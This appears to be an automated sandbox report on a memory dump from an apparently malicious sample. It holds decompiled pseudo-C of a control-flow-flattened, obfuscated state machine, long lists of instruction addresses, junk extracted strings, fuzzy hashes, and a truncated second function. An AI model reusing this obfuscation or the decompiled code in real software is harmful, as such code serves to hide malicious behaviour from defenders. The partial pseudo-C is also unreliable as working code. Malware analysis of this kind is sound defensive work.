				_v548 = _v548 << 1;
				_v548 = _v548 + 0xffff009c;
				_v548 = _v548 ^ 0xc2df1814;
				_v548 = _v548 ^ 0xc3b43072;
				_v400 = 0x83e780;
				_v400 = _v400 / _t1263;
				_v400 = _v400 + 0xffff5fe0;
				_v400 = _v400 ^ 0x0003b045;
				_v392 = 0xcc2700;
				_v392 = _v392 + 0x6318;
				_t1264 = 0x50;
				_v392 = _v392 / _t1264;
				_v392 = _v392 ^ 0x000264e6;
				goto L1;
				do {
					while(1) {
						L1:
						_t1388 = _t1353 - 0x9625c26;
						if(_t1388 > 0) {
							break;
						}
						if(_t1388 == 0) {
							_t1161 = E00BC645F( &_v92, _v596, _v424, _v156, _v420,  &_v108);
							_t1383 = _t1383 + 0x10;
							asm("sbb esi, esi");
							_t1353 = ( ~_t1161 & 0xf38ca8a6) + 0xf16eb84;
							continue;
						}
						_t1389 = _t1353 - 0x5085634;
						if(_t1389 > 0) {
							__eflags = _t1353 - 0x743bbd3;
							if(__eflags > 0) {
								__eflags = _t1353 - 0x7d9812c;
								if(_t1353 == 0x7d9812c) {
									__eflags = E00BCE7DA();
									if(__eflags == 0) {
										_t1165 = E00BC902C();
										asm("sbb esi, esi");
										_t1353 = ( ~_t1165 & 0xfa09740f) + 0xc68510e;
										continue;
									}
									_t1167 = E00BC902C();
									asm("sbb esi, esi");
									_t1369 =  ~_t1167 & 0xfa79cff4;
									L53:
									_t1353 = _t1369 + 0xd96f0c7;
									continue;
								}
								__eflags = _t1353 - 0x810c0bb;
								if(_t1353 == 0x810c0bb) {
									_t1167 = E00BB1DF9();
									asm("sbb esi, esi");
									_t1369 =  ~_t1167 & 0xf771656d;
									__eflags = _t1369;
									goto L53;
								}
								__eflags = _t1353 - 0x8d7d650;
								if(_t1353 == 0x8d7d650) {
									_t1167 = E00BCC772();
									L114:
									return _t1167;
								}
								__eflags = _t1353 - 0x94a2b75;
								if(_t1353 != 0x94a2b75) {
									goto L109;
								}
								_t1278 = _v364;
								_t1167 = E00BBF699(_t1278, _v100, _v472, _v144, _v220);
								_t1383 = _t1383 + 0xc;
								_t1353 = 0xf16eb84;
								continue;
							}
							if(__eflags == 0) {
								_t1167 = _v164;
								_t1353 = 0xc313b49;
								_v76 = _t1167;
								continue;
							}
							__eflags = _t1353 - 0x50ec05a;
							if(_t1353 == 0x50ec05a) {
								_t1167 = E00BB2176();
								_t1353 = 0x24c641b;
								continue;
							}
							__eflags = _t1353 - 0x5c746ce;
							if(_t1353 == 0x5c746ce) {
								_t1167 = E00BC2DE9(_t1278);
								goto L114;
							}
							__eflags = _t1353 - 0x671c51d;
							if(_t1353 == 0x671c51d) {
								_t1167 = E00BD2D4F();
								_t1353 = 0xc68510e;
								continue;
							}
							__eflags = _t1353 - 0x6e9da8a;
							if(_t1353 != 0x6e9da8a) {
								goto L109;
							}
							_t1167 = E00BC56A9();
							__eflags = _t1167;
							if(__eflags == 0) {
								goto L114;
							}
							_t1353 = 0xbae568e;
							continue;
						}
						if(_t1389 == 0) {
							_t1167 = E00BBB12E(_v436, _v292, _v160, _v304);
							goto L114;
						}
						_t1390 = _t1353 - 0x411ce06;
						if(_t1390 > 0) {
							__eflags = _t1353 - 0x414ffd1;
							if(_t1353 == 0x414ffd1) {
								__eflags = _t1350 - _v244;
								if(_t1350 == _v244) {
									L35:
									_t1353 = _t1240;
									goto L109;
								}
								_t1167 = E00BD37B6(_v480, _v236, _v332, _v172, E00BCD4AE(), _t1350);
								_t1383 = _t1383 + 0x10;
								__eflags = _t1167 - _v132;
								if(__eflags == 0) {
									_t1167 = E00BC6B91();
									goto L35;
								}
								_t1353 = 0x5c746ce;
								continue;
							}
							__eflags = _t1353 - 0x4c34997;
							if(_t1353 == 0x4c34997) {
								_t1167 = E00BB635F();
								_v72 = _t1167;
								_t1353 = 0x411ce06;
								continue;
							}
							__eflags = _t1353 - 0x4c43855;
							if(_t1353 == 0x4c43855) {
								_t1167 = E00BC3ABE();
								_t1353 = 0xbc300ba;
								continue;
							}
							__eflags = _t1353 - 0x4ea5811;
							if(__eflags != 0) {
								goto L109;
							}
							_t1167 = E00BD0BF1(__eflags);
							__eflags = _t1167;
							if(__eflags == 0) {
								goto L114;
							}
							_t1353 = 0x15a9200;
							continue;
						}
						if(_t1390 == 0) {
							_t1167 = E00BD27E2();
							_v44 = _t1167;
							_t1353 = 0x743bbd3;
							continue;
						}
						if(_t1353 == 0x15a9200) {
							_t1167 = E00BBF022();
							_t1353 = 0xf17c585;
							continue;
						}
						if(_t1353 == 0x24c641b) {
							_v116 = E00BC8518(_v316, _v404, __eflags,  &_v112, _v568, 0xbb1000);
							_v124 = E00BC8518(_v268, _v496, __eflags,  &_v120, _v188, 0xbb1060);
							_t1197 = E00BB5DC3(_v396,  &_v116, _v560,  &_v124);
							asm("sbb esi, esi");
							_t1353 = ( ~_t1197 & 0x01f8303b) + 0xda639e1;
							E00BC2EED(_v128, _v552, _v432, _v124);
							_t1167 = E00BC2EED(_v488, _v388, _v340, _v116);
							_t1383 = _t1383 + 0x30;
							goto L109;
						}
						if(_t1353 == 0x2a3942a) {
							_t1167 = E00BC4DC5(_v276, _v464, _v348, E00BCD4AE(),  &_v108,  &_v100, _v576);
							_t1383 = _t1383 + 0x14;
							asm("sbb esi, esi");
							_t1353 = ( ~_t1167 & 0x000968d2) + 0x2a3942a;
							continue;
						}
						if(_t1353 != 0x2acfcfc) {
							goto L109;
						}
						_t1204 = E00BB597D( &_v40, _v260,  &_v100, _v416);
						_pop(_t1278);
						if(_t1204 != 0) {
							_t1167 = _v8;
							__eflags = _t1167 - 8;
							if(__eflags != 0) {
								__eflags = _t1167;
								if(__eflags == 0) {
									L18:
									_t1353 = 0xabc2d6d;
									continue;
								}
								__eflags = _t1167 - 1;
								if(__eflags != 0) {
									L13:
									_t1353 = 0x94a2b75;
									continue;
								}
								goto L18;
							}
							_t1353 = 0x8d7d650;
							continue;
						}
						_push(_t1278);
						_push(_v584);
						_push(_t1278);
						_t1278 = _v412;
						_t1167 = E00BC2CCF(_t1278, _t1278);
						_t1383 = _t1383 + 0x10;
						_t1350 = _t1167;
						_t1240 = 0xe75263b;
						goto L13;
					}
					__eflags = _t1353 - 0xc68510e;
					if(__eflags > 0) {
						__eflags = _t1353 - 0xf17c585;
						if(__eflags > 0) {
							__eflags = _t1353 - 0xf2d358e;
							if(_t1353 == 0xf2d358e) {
								_t1157 = E00BC902C();
								__eflags = _t1157;
								if(_t1157 == 0) {
									_t1167 = E00BB3E3B();
								}
								_t1353 = 0x94a2b75;
								goto L109;
							}
							__eflags = _t1353 - 0xf885e3b;
							if(__eflags == 0) {
								_v92 = E00BB7A75();
								_t1353 = 0x4c34997;
								goto L1;
							}
							__eflags = _t1353 - 0xf9e6a1c;
							if(_t1353 != 0xf9e6a1c) {
								goto L109;
							}
							E00BB60BA();
							_t1240 = 0xc2716a1;
							_push(_t1278);
							_push(_v312);
							_push(_t1278);
							_t1278 = _v184;
							_t1167 = E00BC2CCF(_t1278, _t1278);
							_t1383 = _t1383 + 0x10;
							_t1350 = _t1167;
							L95:
							_t1353 = 0x414ffd1;
							goto L1;
						}
						if(__eflags == 0) {
							_t1167 = E00BB8112();
							__eflags = _t1167;
							if(__eflags == 0) {
								goto L114;
							}
							_t1353 = 0xa4cd57e;
							goto L1;
						}
						__eflags = _t1353 - 0xce7cb5b;
						if(_t1353 == 0xce7cb5b) {
							E00BC89DA();
							_t1167 = E00BC902C();
							asm("sbb esi, esi");
							_t1353 = ( ~_t1167 & 0xf901379b) + 0xbc300ba;
							goto L1;
						}
						__eflags = _t1353 - 0xd96f0c7;
						if(_t1353 == 0xd96f0c7) {
							_t1167 = E00BCAEAE();
							_t1353 = 0x50ec05a;
							goto L1;
						}
						__eflags = _t1353 - 0xe75263b;
						if(_t1353 == 0xe75263b) {
							_t1167 = E00BC75E9(_v344, _v484,  &_v52);
							_pop(_t1278);
							_t1353 = 0x9625c26;
							goto L1;
						}
						__eflags = _t1353 - 0xf16eb84;
						if(_t1353 != 0xf16eb84) {
							goto L109;
						}
						_t1278 = _v224;
						_t1167 = E00BBF699(_t1278, _v108, _v232, _v492, _v352);
						_t1383 = _t1383 + 0xc;
						goto L95;
					}
					if(__eflags == 0) {
						_t1167 = E00BCC145();
						_t1353 = 0xb042b16;
						goto L1;
					}
					__eflags = _t1353 - 0xbae568e;
					if(__eflags > 0) {
						__eflags = _t1353 - 0xbc300ba;
						if(_t1353 == 0xbc300ba) {
							_t1167 = E00BCCE94();
							_t1353 = 0x5085634;
							goto L1;
						}
						__eflags = _t1353 - 0xc2716a1;
						if(_t1353 == 0xc2716a1) {
							_v68 = E00BC5B73();
							_t1167 = E00BC4268(_v248, _v256, _t1216);
							_pop(_t1278);
							_v64 = _t1167;
							_t1353 = 0xf885e3b;
							goto L1;
						}
						__eflags = _t1353 - 0xc313b49;
						if(__eflags == 0) {
							_t1167 = _v508;
							_t1353 = 0xe75263b;
							_v88 = _t1167;
							goto L1;
						}
						__eflags = _t1353 - 0xc58f524;
						if(_t1353 != 0xc58f524) {
							goto L109;
						}
						_t1167 = E00BB8D59();
						__eflags = _t1167;
						if(__eflags == 0) {
							goto L114;
						}
						_t1353 = 0xce7cb5b;
						goto L1;
					}
					if(__eflags == 0) {
						_t1167 = E00BB196D();
						asm("sbb esi, esi");
						_t1353 = ( ~_t1167 & 0x032aa9ea) + 0x7d9812c;
						goto L1;
					}
					__eflags = _t1353 - 0xa4cd57e;
					if(_t1353 == 0xa4cd57e) {
						_t1167 = E00BB60BA();
						__eflags = _t1167;
						if(__eflags == 0) {
							goto L114;
						}
						_t1353 = 0x6e9da8a;
						goto L1;
					}
					__eflags = _t1353 - 0xaa07b46;
					if(__eflags == 0) {
						_t1353 = 0x4ea5811;
						goto L1;
					}
					__eflags = _t1353 - 0xabc2d6d;
					if(_t1353 == 0xabc2d6d) {
						_t1167 = E00BB39C3(_v136,  &_v32);
						_pop(_t1278);
						__eflags = _t1167;
						if(__eflags == 0) {
							_t1167 = _v8;
							__eflags = _t1167;
							if(_t1167 == 0) {
								_push(_t1278);
								_push(_v556);
								_push(_t1278);
								_t1278 = _v548;
								_t1350 = E00BC2CCF(_t1278, _t1278);
								_t1383 = _t1383 + 0x10;
								_t1167 = _v8;
							}
							__eflags = _t1167 - 1;
							if(__eflags == 0) {
								_push(_t1278);
								_push(_v400);
								_push(_t1278);
								_t1278 = _v392;
								_t1167 = E00BC2CCF(_t1278, _t1278);
								_t1383 = _t1383 + 0x10;
								_t1350 = _t1167;
							}
						} else {
							_t1350 = _v196;
						}
						_t1240 = 0xe75263b;
						_t1353 = 0xf2d358e;
						goto L1;
					}
					__eflags = _t1353 - 0xb042b16;
					if(_t1353 != 0xb042b16) {
						goto L109;
					}
					_t1167 = E00BCBA18();
					_t1353 = 0xc58f524;
					goto L1;
					L109:
					__eflags = _t1353 - 0xda639e1;
				} while (__eflags != 0);
				goto L114;
			}

0x00bc91fd
0x00bc9207
0x00bc9214
0x00bc921f
0x00bc922a
0x00bc9235
0x00bc9240
0x00bc924b
0x00bc9256
0x00bc925d
0x00bc9268
0x00bc9270
0x00bc9278
0x00bc9280
0x00bc9288
0x00bc9290
0x00bc929b
0x00bc92a6
0x00bc92b1
0x00bc92bc
0x00bc92c7
0x00bc92d2
0x00bc92dd
0x00bc92e8
0x00bc92f3
0x00bc92fe
0x00bc9309
0x00bc9311
0x00bc931c
0x00bc932f
0x00bc9336
0x00bc9344
0x00bc9349
0x00bc9352
0x00bc935d
0x00bc9369
0x00bc936c
0x00bc9370
0x00bc9378
0x00bc937d
0x00bc9385
0x00bc938d
0x00bc9392
0x00bc939a
0x00bc93a2
0x00bc93aa
0x00bc93b5
0x00bc93c8
0x00bc93cf
0x00bc93da
0x00bc93e5
0x00bc93ed
0x00bc93f8
0x00bc9400
0x00bc9405
0x00bc940d
0x00bc9415
0x00bc941d
0x00bc9425
0x00bc942a
0x00bc9437
0x00bc943b
0x00bc9443
0x00bc944e
0x00bc9459
0x00bc9464
0x00bc946f
0x00bc9486
0x00bc9489
0x00bc9490
0x00bc949b
0x00bc94a6
0x00bc94b9
0x00bc94c0
0x00bc94cb
0x00bc94d6
0x00bc94de
0x00bc94e6
0x00bc94f1
0x00bc94fc
0x00bc9507
0x00bc950f
0x00bc951a
0x00bc9530
0x00bc9537
0x00bc9542
0x00bc9557
0x00bc955a
0x00bc9566
0x00bc956a
0x00bc9572
0x00bc957d
0x00bc9585
0x00bc958c
0x00bc9597
0x00bc95aa
0x00bc95ab
0x00bc95b2
0x00bc95bd
0x00bc95c8
0x00bc95d3
0x00bc95db
0x00bc95e6
0x00bc95f1
0x00bc95fc
0x00bc9604
0x00bc960f
0x00bc961a
0x00bc9625
0x00bc9630
0x00bc963b
0x00bc9646
0x00bc9654
0x00bc9658
0x00bc9660
0x00bc9665
0x00bc966d
0x00bc9680
0x00bc9687
0x00bc9692
0x00bc969d
0x00bc96b0
0x00bc96b7
0x00bc96c2
0x00bc96cd
0x00bc96d8
0x00bc96e3
0x00bc96f0
0x00bc96fb
0x00bc9706
0x00bc9711
0x00bc971c
0x00bc9730
0x00bc9735
0x00bc973e
0x00bc9749
0x00bc9754
0x00bc975f
0x00bc976a
0x00bc9775
0x00bc9780
0x00bc9788
0x00bc9793
0x00bc979b
0x00bc97a6
0x00bc97ae
0x00bc97bb
0x00bc97be
0x00bc97ca
0x00bc97ce
0x00bc97d6
0x00bc97e1
0x00bc97ec
0x00bc97f7
0x00bc9802
0x00bc980d
0x00bc981f
0x00bc9824
0x00bc9834
0x00bc9839
0x00bc9842
0x00bc984d
0x00bc9858
0x00bc9863
0x00bc986b
0x00bc9876
0x00bc987e
0x00bc9883
0x00bc9884
0x00bc9888
0x00bc9890
0x00bc9898
0x00bc98a0
0x00bc98b4
0x00bc98bb
0x00bc98c6
0x00bc98ce
0x00bc98d6
0x00bc98db
0x00bc98e3
0x00bc98eb
0x00bc98f6
0x00bc9901
0x00bc990e
0x00bc9922
0x00bc9927
0x00bc992e
0x00bc9939
0x00bc9944
0x00bc994c
0x00bc9954
0x00bc995c
0x00bc9961
0x00bc9969
0x00bc9974
0x00bc997c
0x00bc9987
0x00bc9997
0x00bc999d
0x00bc99a5
0x00bc99ad
0x00bc99b5
0x00bc99c0
0x00bc99cb
0x00bc99d6
0x00bc99de
0x00bc99e9
0x00bc99f4
0x00bc9a07
0x00bc9a0a
0x00bc9a11
0x00bc9a1c
0x00bc9a27
0x00bc9a3a
0x00bc9a41
0x00bc9a49
0x00bc9a54
0x00bc9a5f
0x00bc9a72
0x00bc9a79
0x00bc9a84
0x00bc9a9a
0x00bc9aa1
0x00bc9aac
0x00bc9ab7
0x00bc9ac2
0x00bc9acd
0x00bc9ad8
0x00bc9ae3
0x00bc9aee
0x00bc9af9
0x00bc9b04
0x00bc9b0f
0x00bc9b1a
0x00bc9b2c
0x00bc9b2f
0x00bc9b36
0x00bc9b41
0x00bc9b4c
0x00bc9b54
0x00bc9b5f
0x00bc9b6a
0x00bc9b75
0x00bc9b80
0x00bc9b8b
0x00bc9b96
0x00bc9ba1
0x00bc9bac
0x00bc9bb7
0x00bc9bc2
0x00bc9bcf
0x00bc9bda
0x00bc9be2
0x00bc9bed
0x00bc9bf8
0x00bc9c03
0x00bc9c0e
0x00bc9c19
0x00bc9c24
0x00bc9c2f
0x00bc9c37
0x00bc9c3f
0x00bc9c4a
0x00bc9c5e
0x00bc9c63
0x00bc9c6c
0x00bc9c77
0x00bc9c82
0x00bc9c8a
0x00bc9c95
0x00bc9ca0
0x00bc9cab
0x00bc9cb6
0x00bc9cbe
0x00bc9cc6
0x00bc9cd1
0x00bc9cd9
0x00bc9ce1
0x00bc9ce6
0x00bc9cee
0x00bc9cf6
0x00bc9d01
0x00bc9d0c
0x00bc9d17
0x00bc9d22
0x00bc9d2d
0x00bc9d38
0x00bc9d43
0x00bc9d4e
0x00bc9d56
0x00bc9d61
0x00bc9d6c
0x00bc9d74
0x00bc9d7c
0x00bc9d84
0x00bc9d8c
0x00bc9d94
0x00bc9d9f
0x00bc9daa
0x00bc9db5
0x00bc9dc0
0x00bc9dc8
0x00bc9dd3
0x00bc9dde
0x00bc9de9
0x00bc9df1
0x00bc9df6
0x00bc9dfe
0x00bc9e03
0x00bc9e0b
0x00bc9e1d
0x00bc9e20
0x00bc9e27
0x00bc9e32
0x00bc9e3d
0x00bc9e45
0x00bc9e50
0x00bc9e5b
0x00bc9e66
0x00bc9e71
0x00bc9e7c
0x00bc9e87
0x00bc9e92
0x00bc9ea8
0x00bc9ead
0x00bc9eb6
0x00bc9ec1
0x00bc9ec9
0x00bc9ed1
0x00bc9ed9
0x00bc9ee1
0x00bc9ee9
0x00bc9ef4
0x00bc9efc
0x00bc9f07
0x00bc9f12
0x00bc9f1d
0x00bc9f28
0x00bc9f33
0x00bc9f3e
0x00bc9f49
0x00bc9f54
0x00bc9f61
0x00bc9f64
0x00bc9f68
0x00bc9f75
0x00bc9f79
0x00bc9f81
0x00bc9f8c
0x00bc9f97
0x00bc9fa2
0x00bc9fb2
0x00bc9fb6
0x00bc9fc2
0x00bc9fc5
0x00bc9fc9
0x00bc9fd1
0x00bc9fd9
0x00bc9fe6
0x00bc9fea
0x00bc9ff2
0x00bc9ffd
0x00bca008
0x00bca010
0x00bca01b
0x00bca023
0x00bca028
0x00bca02d
0x00bca035
0x00bca03d
0x00bca045
0x00bca04d
0x00bca055
0x00bca05d
0x00bca065
0x00bca070
0x00bca07b
0x00bca086
0x00bca091
0x00bca099
0x00bca0a4
0x00bca0af
0x00bca0c2
0x00bca0c9
0x00bca0d1
0x00bca0dc
0x00bca0f2
0x00bca0f7
0x00bca100
0x00bca10b
0x00bca116
0x00bca121
0x00bca12c
0x00bca137
0x00bca142
0x00bca14d
0x00bca158
0x00bca163
0x00bca16e
0x00bca179
0x00bca184
0x00bca18f
0x00bca1a2
0x00bca1a5
0x00bca1ac
0x00bca1b7
0x00bca1c2
0x00bca1cd
0x00bca1d8
0x00bca1e0
0x00bca1ed
0x00bca1f1
0x00bca1f9
0x00bca201
0x00bca20c
0x00bca217
0x00bca21f
0x00bca22a
0x00bca232
0x00bca23a
0x00bca242
0x00bca246
0x00bca24e
0x00bca259
0x00bca264
0x00bca26f
0x00bca27a
0x00bca285
0x00bca290
0x00bca298
0x00bca2a3
0x00bca2b9
0x00bca2c0
0x00bca2cb
0x00bca2d6
0x00bca2e1
0x00bca2e8
0x00bca2f3
0x00bca305
0x00bca308
0x00bca30f
0x00bca31a
0x00bca325
0x00bca330
0x00bca33b
0x00bca346
0x00bca351
0x00bca359
0x00bca360
0x00bca36b
0x00bca376
0x00bca383
0x00bca397
0x00bca39c
0x00bca3a5
0x00bca3b5
0x00bca3bd
0x00bca3c5
0x00bca3cd
0x00bca3d5
0x00bca3dd
0x00bca3e8
0x00bca3f8
0x00bca3fb
0x00bca402
0x00bca409
0x00bca410
0x00bca41b
0x00bca426
0x00bca431
0x00bca43c
0x00bca447
0x00bca452
0x00bca45d
0x00bca468
0x00bca470
0x00bca47a
0x00bca47e
0x00bca486
0x00bca48e
0x00bca496
0x00bca49a
0x00bca4a2
0x00bca4a7
0x00bca4af
0x00bca4ba
0x00bca4c5
0x00bca4d0
0x00bca4db
0x00bca4e3
0x00bca4e7
0x00bca4ef
0x00bca4f7
0x00bca4ff
0x00bca515
0x00bca51c
0x00bca527
0x00bca532
0x00bca53d
0x00bca54f
0x00bca552
0x00bca559
0x00bca559
0x00bca564
0x00bca564
0x00bca564
0x00bca564
0x00bca56a
0x00000000
0x00000000
0x00bca570
0x00bcaa28
0x00bcaa2d
0x00bcaa34
0x00bcaa3c
0x00000000
0x00bcaa3c
0x00bca576
0x00bca57c
0x00bca896
0x00bca89c
0x00bca936
0x00bca93c
0x00bca9bf
0x00bca9c1
0x00bca9e4
0x00bca9ed
0x00bca9f5
0x00000000
0x00bca9f5
0x00bca9ca
0x00bca9d3
0x00bca9d5
0x00bca9ab
0x00bca9ab
0x00000000
0x00bca9ab
0x00bca93e
0x00bca944
0x00bca99a
0x00bca9a3
0x00bca9a5
0x00bca9a5
0x00000000
0x00bca9a5
0x00bca946
0x00bca94c
0x00bcae59
0x00bcae5e
0x00bcae65
0x00bcae65
0x00bca952
0x00bca958
0x00000000
0x00000000
0x00bca97a
0x00bca981
0x00bca986
0x00bca989
0x00000000
0x00bca989
0x00bca8a2
0x00bca91e
0x00bca925
0x00bca92a
0x00000000
0x00bca92a
0x00bca8a4
0x00bca8aa
0x00bca90f
0x00bca914
0x00000000
0x00bca914
0x00bca8ac
0x00bca8b2
0x00bcae4b
0x00000000
0x00bcae4b
0x00bca8b8
0x00bca8be
0x00bca8f5
0x00bca8fa
0x00000000
0x00bca8fa
0x00bca8c0
0x00bca8c6
0x00000000
0x00000000
0x00bca8d7
0x00bca8dc
0x00bca8de
0x00000000
0x00000000
0x00bca8e4
0x00000000
0x00bca8e4
0x00bca582
0x00bcae3a
0x00000000
0x00bcae3f
0x00bca588
0x00bca58e
0x00bca7b8
0x00bca7be
0x00bca838
0x00bca83f
0x00bca88f
0x00bca88f
0x00000000
0x00bca88f
0x00bca868
0x00bca86d
0x00bca870
0x00bca877
0x00bca88a
0x00000000
0x00bca88a
0x00bca879
0x00000000
0x00bca879
0x00bca7c0
0x00bca7c6
0x00bca822
0x00bca827
0x00bca82e
0x00000000
0x00bca82e
0x00bca7c8
0x00bca7ce
0x00bca805
0x00bca80a
0x00000000
0x00bca80a
0x00bca7d0
0x00bca7d6
0x00000000
0x00000000
0x00bca7e7
0x00bca7ec
0x00bca7ee
0x00000000
0x00000000
0x00bca7f4
0x00000000
0x00bca7f4
0x00bca594
0x00bca7a2
0x00bca7a7
0x00bca7ae
0x00000000
0x00bca7ae
0x00bca5a0
0x00bca78c
0x00bca791
0x00000000
0x00bca791
0x00bca5ac
0x00bca6d1
0x00bca6ff
0x00bca720
0x00bca742
0x00bca74a
0x00bca750
0x00bca771
0x00bca776
0x00000000
0x00bca776
0x00bca5b8
0x00bca68b
0x00bca690
0x00bca697
0x00bca69f
0x00000000
0x00bca69f
0x00bca5c4
0x00000000
0x00000000
0x00bca5e7
0x00bca5ed
0x00bca5f0
0x00bca62f
0x00bca636
0x00bca639
0x00bca645
0x00bca647
0x00bca64e
0x00bca64e
0x00000000
0x00bca64e
0x00bca649
0x00bca64c
0x00bca625
0x00bca625
0x00000000
0x00bca625
0x00000000
0x00bca64c
0x00bca63b
0x00000000
0x00bca63b
0x00bca60b
0x00bca60c
0x00bca610
0x00bca612
0x00bca619
0x00bca61e
0x00bca621
0x00bca623
0x00000000
0x00bca623
0x00bcaa47
0x00bcaa4d
0x00bcac6a
0x00bcac70
0x00bcad69
0x00bcad6f
0x00bcadf6
0x00bcadfb
0x00bcadfd
0x00bcae06
0x00bcae06
0x00bcae0b
0x00000000
0x00bcae0b
0x00bcad71
0x00bcad77
0x00bcadde
0x00bcade5
0x00000000
0x00bcade5
0x00bcad79
0x00bcad7f
0x00000000
0x00000000
0x00bcad8c
0x00bcad98
0x00bcadb2
0x00bcadb3
0x00bcadba
0x00bcadbc
0x00bcadc3
0x00bcadc8
0x00bcadcb
0x00bcacc8
0x00bcacc8
0x00000000
0x00bcacc8
0x00bcac76
0x00bcad52
0x00bcad57
0x00bcad59
0x00000000
0x00000000
0x00bcad5f
0x00000000
0x00bcad5f
0x00bcac7c
0x00bcac82
0x00bcad1c
0x00bcad28
0x00bcad31
0x00bcad39
0x00000000
0x00bcad39
0x00bcac88
0x00bcac8e
0x00bcad06
0x00bcad0b
0x00000000
0x00bcad0b
0x00bcac90
0x00bcac92
0x00bcace8
0x00bcaced
0x00bcacee
0x00000000
0x00bcacee
0x00bcac94
0x00bcac9a
0x00000000
0x00000000
0x00bcacb9
0x00bcacc0
0x00bcacc5
0x00000000
0x00bcacc5
0x00bcaa53
0x00bcac5b
0x00bcac60
0x00000000
0x00bcac60
0x00bcaa59
0x00bcaa5f
0x00bcab9b
0x00bcaba1
0x00bcac3e
0x00bcac43
0x00000000
0x00bcac43
0x00bcaba7
0x00bcabad
0x00bcac15
0x00bcac1c
0x00bcac21
0x00bcac22
0x00bcac29
0x00000000
0x00bcac29
0x00bcabaf
0x00bcabb5
0x00bcabe8
0x00bcabec
0x00bcabee
0x00000000
0x00bcabee
0x00bcabb7
0x00bcabbd
0x00000000
0x00000000
0x00bcabd1
0x00bcabd6
0x00bcabd8
0x00000000
0x00000000
0x00bcabde
0x00000000
0x00bcabde
0x00bcaa65
0x00bcab7f
0x00bcab88
0x00bcab90
0x00000000
0x00bcab90
0x00bcaa6b
0x00bcaa71
0x00bcab5d
0x00bcab62
0x00bcab64
0x00000000
0x00000000
0x00bcab6a
0x00000000
0x00bcab6a
0x00bcaa77
0x00bcaa7d
0x00bcab4f
0x00000000
0x00bcab4f
0x00bcaa83
0x00bcaa89
0x00bcaac0
0x00bcaac5
0x00bcaac6
0x00bcaac8
0x00bcaad3
0x00bcaada
0x00bcaadc
0x00bcaaf1
0x00bcaaf2
0x00bcaaf6
0x00bcaaf8
0x00bcab01
0x00bcab03
0x00bcab06
0x00bcab06
0x00bcab0d
0x00bcab10
0x00bcab28
0x00bcab29
0x00bcab30
0x00bcab32
0x00bcab39
0x00bcab3e
0x00bcab41
0x00bcab41
0x00bcaaca
0x00bcaaca
0x00bcaaca
0x00bcab43
0x00bcab45
0x00000000
0x00bcab45
0x00bcaa8b
0x00bcaa91
0x00000000
0x00000000
0x00bcaa9b
0x00bcaaa0
0x00000000
0x00bcae10
0x00bcae10
0x00bcae10
0x00000000

Strings

8YNn, xrefs: 00BC9235
qM0, xrefs: 00BCA4BA
&\b, xrefs: 00BCACEE
[, xrefs: 00BC9BC2
oC., xrefs: 00BC9207
@0, xrefs: 00BC939A
u+J, xrefs: 00BCA952
Ao, xrefs: 00BCA2C0
,H<, xrefs: 00BCA351
ll, xrefs: 00BC9788
fM6, xrefs: 00BC9E32
u+J, xrefs: 00BCA625
;, xrefs: 00BC9F68
jo, xrefs: 00BC9F8C
*p, xrefs: 00BC9658
~/, xrefs: 00BC95DB
td, xrefs: 00BC9DF6
&\b, xrefs: 00BCA564
q, xrefs: 00BC9268
~c, xrefs: 00BC97D6
&]^, xrefs: 00BCA24E
u+J, xrefs: 00BCAE0B
CK, xrefs: 00BC987E
]p, xrefs: 00BC940D
l?U, xrefs: 00BC98EB

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: qM0$&\b$&\b$&]^$*p$,H<$8YNn$@0$Ao$CK$]p$fM6$jo$l?U$ll$oC.$td$u+J$u+J$u+J$~/$;$~c$[$q
API String ID: 0-640385374
Opcode ID: 4d039a6561f1ba68352efbfcb4f4681a9fe8c5ffd0883a626506add1987e5782
Instruction ID: 232c7c7f3fe568f9cccff137a32e6cfed3d78bd89b446f9981162317d772cd41
Opcode Fuzzy Hash: 4d039a6561f1ba68352efbfcb4f4681a9fe8c5ffd0883a626506add1987e5782
Instruction Fuzzy Hash: 69D232719083818BD3B8DF24C58ABDBBBE1BB94708F10891DE5DD96260DBB48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1D380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ED1D380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ED239D0;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed6e128; // 0x1390000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
